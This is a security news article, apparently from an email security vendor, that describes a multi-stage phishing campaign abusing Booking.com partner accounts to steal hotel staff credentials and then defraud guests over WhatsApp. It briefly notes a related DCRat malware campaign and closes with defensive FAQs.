Booking.com partners abused in multi-stage phishing campaign

Attackers are compromising hotel partner accounts to pivot toward customer payment fraud.

What happened

A new phishing campaign is abusing the Booking.com partner platform in a coordinated fraud operation targeting both hotel staff and travelers. According to GBHackers, attackers first send phishing emails to hotel reservation or service desk inboxes while pretending to be Booking.com support messages about bookings or guest complaints. The emails link to fake websites that closely imitate the official partner login page, allowing attackers to steal staff credentials and access real booking information. Using that data, the attackers then target customers directly through WhatsApp messages that include legitimate reservation details and urgent payment requests, redirecting victims to a second phishing page designed to capture credit card information.

Going deeper

The attack operates through three coordinated stages. First, attackers send phishing emails from patterned Gmail accounts and homograph domains, where lookalike characters such as Cyrillic letters replace normal ones to create convincing fake Booking.com links. Second, victims are redirected to a phishing site that closely imitates the real Booking.com portal, using browser and device checks to filter real targets while sending security scanners to harmless decoy pages. Once login credentials are stolen, the third stage uses the compromised accounts to access booking details and send convincing WhatsApp payment messages to guests containing real reservation information. Final payment pages are protected behind Cloudflare CAPTCHA verification and automatically fill in booking data, making the scam appear legitimate and reducing hesitation from victims.

What was said

Researchers who investigated the activity stated in their published analysis that the campaign demonstrates “a coordinated multi-stage infection chain” targeting two sequential victim groups: hotel partners and their customers. The analysis noted that the phishing infrastructure applied “root domain user fingerprinting” and strong visual impersonation of the partner portal to reduce detection and increase success rates.

In the know

Recently, researchers also uncovered a separate phishing campaign targeting hospitality organizations through fake Booking.com reservation messages that ultimately deploy remote access malware. In that operation, tracked as PHALT#BLYX, hotel staff received emails posing as booking cancellations that redirected them to convincing imitation pages displaying fake CAPTCHA checks and simulated system errors. Victims were instructed to run commands to resolve the issue, unknowingly launching a PowerShell sequence that installed the DCRat remote access trojan. Unlike the credential theft scheme described above, the goal was persistent system access rather than immediate payment fraud. Together, the campaigns show how attackers are expanding beyond simple phishing emails, combining account compromise, social engineering, and remote access techniques to exploit trusted hospitality platforms from multiple angles.

The big picture

Research published by Security Brief shows that even trusted business platforms can be exploited for cybercrime, as seen in the Booking.com phishing campaign. Instead of simply impersonating brands, attackers compromise legitimate partner accounts to make fraudulent messages appear genuine. The result is a more advanced form of social engineering, where criminals combine stolen account access, malware delivery, and the resale of login credentials into coordinated profit-driven operations. For the hospitality sector, which relies heavily on online bookings and constant communication with guests, these attacks increase the risk of financial losses and reputational harm. Security researchers note that multilayered email protection using AI and machine learning detection can help reduce the likelihood of these attacks reaching users' inboxes. Platforms such as Paubox's new inbound email security, which applies generative AI analysis to incoming messages, represent one example of how organizations are strengthening defenses against credential harvesting and phishing activity.

FAQs

Why are hotel partners targeted first instead of guests directly?

Compromising partner accounts provides attackers with legitimate booking data, which increases credibility when contacting customers and improves the success rate of payment fraud.

What is an IDN homograph domain?

An IDN homograph domain uses visually similar characters from different alphabets, such as Cyrillic letters replacing Latin ones, to create deceptive web addresses that resemble trusted brands.

How does root domain fingerprinting help attackers?

Fingerprinting techniques analyze browser characteristics, device attributes, and behavior to filter out security researchers and automated scanners, ensuring only intended victims see the phishing portal.

Why is WhatsApp used in the second stage?

Messaging platforms create urgency and appear more personal, especially when attackers include accurate reservation details that make the request appear legitimate.

What defensive steps can hospitality businesses take?

Hotels can enforce phishing-resistant authentication on partner accounts, monitor for unusual login activity, restrict third-party messaging access, and educate staff on complaint-themed phishing emails that impersonate platform providers.